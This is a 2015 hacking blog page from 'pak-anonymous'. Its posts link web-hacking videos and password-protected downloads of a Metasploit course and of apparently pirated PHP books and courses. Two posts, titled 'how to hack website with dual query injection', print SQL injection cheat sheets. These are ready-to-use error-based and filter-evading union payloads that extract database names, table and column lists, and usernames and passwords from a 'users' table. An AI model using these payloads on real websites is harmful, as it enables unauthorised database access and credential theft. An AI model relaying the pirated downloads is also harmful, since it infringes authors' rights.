New Post

Rss

Wednesday, 25 November 2015
Target base website hacking (part 1)

Target base website hacking (part 1)




i will make more videos on web hacking try to understand logic why i am using any tool and what information i get and where we use that info :) 
these videos for those who want to be a pentester :) 
 i will make series on web hacking and also on other contents :) 
this is for educational purpose 
use your knowledge for good purpose




Target base website hacking (part 1) by pak-anonymous
Monday, 23 November 2015
Metasploit Framework for Beginners free download

Metasploit Framework for Beginners free download





This is free for you :D 
Download all parts 
Password = waleed jutt

you need password to open course rar file :) 


Part 1(Password = waleed jutt)


Part 2(Password = waleed jutt)


Part 3(Password = waleed jutt)


Part 4(Password = waleed jutt)



Password = waleed jutt

you need password to open course rar file :)

lol now first copy password then download course.




Saturday, 21 November 2015
PHP Complete PDF Collection Free Download

PHP Complete PDF Collection Free Download






Advanced PHP Programming


Advanced.PHP.for.Web.Professionals.chm


Beginning PHP 5 and MySQL E-Commerce


Beginning PHP and MySQL 5 From Novice to Professional


Learning PHP and MySQL


MySQL PHP Database Applications


OBJECT-ORIENTED PHP


PHP - Advanced Tutorial


PHP 5 Unleashed.chm


PHP Developer's Dictionary - Sams.pdf


PHP File Uploader.pdf


PHP Object-Oriented Solutions


PHP Solutions Dynamic Web Design Made Easy - Friends of ED


PHP by Example


PHP5 and MySQL Bible.pdf


PHP_Functions_Essential_Reference.chm


Php For The World Wide Web Visual Quickstart Guide.chm


Professional PHP Programming.pdf


Sams, Teach Yourself Php, Mysql And Apache All In One (2004) Ddu Shareconnector.chm


Sams.Sams.Teach.Yourself.PHP.in.10.Minutes.Mar.2005.eBook-LiB.chm


Sams.Teach.Yourself.PHP.MySQL.and.Apache.All.in.One.3rd.Edition.Jun.2006.chm



Zend PHP 5 Certification Guide.pdf



php_programming.pdf



Friday, 20 November 2015
Building a Social Network in PHP & MySQL From Scratch free download

Building a Social Network in PHP & MySQL From Scratch free download



Course Description
Learn how to create a basic, but beautiful Social Networking Website and Discussion Forum using simple PHP and MySQLi web development techniques.
Build Social Networking Website Yourself in PHP!
Social Networking websites are communities where you can share something with the world and people can interact with you. After taking this course, you can create the same thing yourself using simple PHP and MySQLi from scratch. Users can comment, can message and can view other members on this social network.
The Content & Overview
With over 75 lectures and 15 hours of content, this course is designed to help you in creating a very basic but powerful social networking website from scratch, You are learning from an instructor who is web developer himself. You should know the basics of PHP & MySQLi before joining this course, because we'll straight start working on the project instead of explaining the basic syntax of PHP. We'll first create the web development environment on our local computer and after that we'll start working on the project step by step. At the end of the course, you'll be able to create a beautiful social networking website yourself.
Below are some of the main features of this social network:
  • Sign Up & Sign In Systems
  • User Timeline & User Postings
  • User Profile and Members Area
  • Commenting & Replies
  • Sending & Receiving Messages
  • Admin Panel
What are the requirements?
  • Internet Connection
  • An Internet Browser (ex: Chrome)
  • XAMPP & Notepad++
  • Basic Understanding of HTML & CSS
  • Basic Understanding of PHP & JavaScript
What am I going to get from this course?
  • Build a Beautiful Social Networking Website & Discussion Forum in PHP & MySQLi
  • Strengthen Your Skills by Creating an Advanced Project in PHP from Scratch
  • Take Your PHP & MySQLi Web Development Career to the Next Level

What is the target audience?

This course is for those who want to learn how to create a beautiful social networking website along with social discussion forum in PHP & MySQLi from scratch

NOTE:All of the links updated again :) now all of the links are 100% working and tested if you have
Any problem in download or extraction please inform me :)
Download all part then extract if you miss any part it will not work :)

Here video help u in downloading :) 



part 1


part 2


part 3


part 4


part 5


part 6


part 7


part 8


part 9


part 10 






Sunday, 15 November 2015
SQL INJECTION (PART 4) DUAL QUERY INJECTION

SQL INJECTION (PART 4) DUAL QUERY INJECTION





Note:First watch other parts then watch this :) 

dual query injection cheat sheet :)


AND  (select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a) 

AND (select 1 from  (select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)c) 

AND (select 1 from  (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)c) 

AND (select 1 from  (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)c) 

AND (select 1 from  (select count(*), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)c)

AND (select 1 from  (select count(*), concat(0x3a,0x3a,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)c) 

AND (select 1 from  (select count(*), concat(0x3a,0x3a,(select password from users limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)c) 

challenge solution :)

union(select!a-~0.+from(select(select database())a)c)

union(select!a-~0.+from(select(select current_user)a)c) 

union(select!a-~0.+from(select(select version())a)c)

+union(select!a-~0.+from(select(select+group_concat(table_name)from+information_schema.tables+where+table_schema=database())a)c)--+

union(select!a-~0.+from(select(select+group_concat(column_name)from+information_schema.columns+where+table_name='users')a)c)

union(select!a-~0.+from(select(select+group_concat(username,0x3a,password)from users)a)c)




SQL INJECTION (PART 3) DUAL QUERY INJECTION 2/2 by pak-anonymous
Saturday, 14 November 2015
sql injection (part 3) dual query injection

sql injection (part 3) dual query injection




NOTE::watch first 2 parts then watch this part 

dual query injection cheat sheet :)




AND (select 1 from  (select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)c) 

AND (select 1 from  (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)c) 

AND (select 1 from  (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)c) 

AND (select 1 from  (select count(*), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)c)

AND (select 1 from  (select count(*), concat(0x3a,0x3a,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)c) 

AND (select 1 from  (select count(*), concat(0x3a,0x3a,(select password from users limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)c) 





how to hack website with dual query injection by pak-anonymous
Copyright © 2015 Pak Anonymous All Right Reserved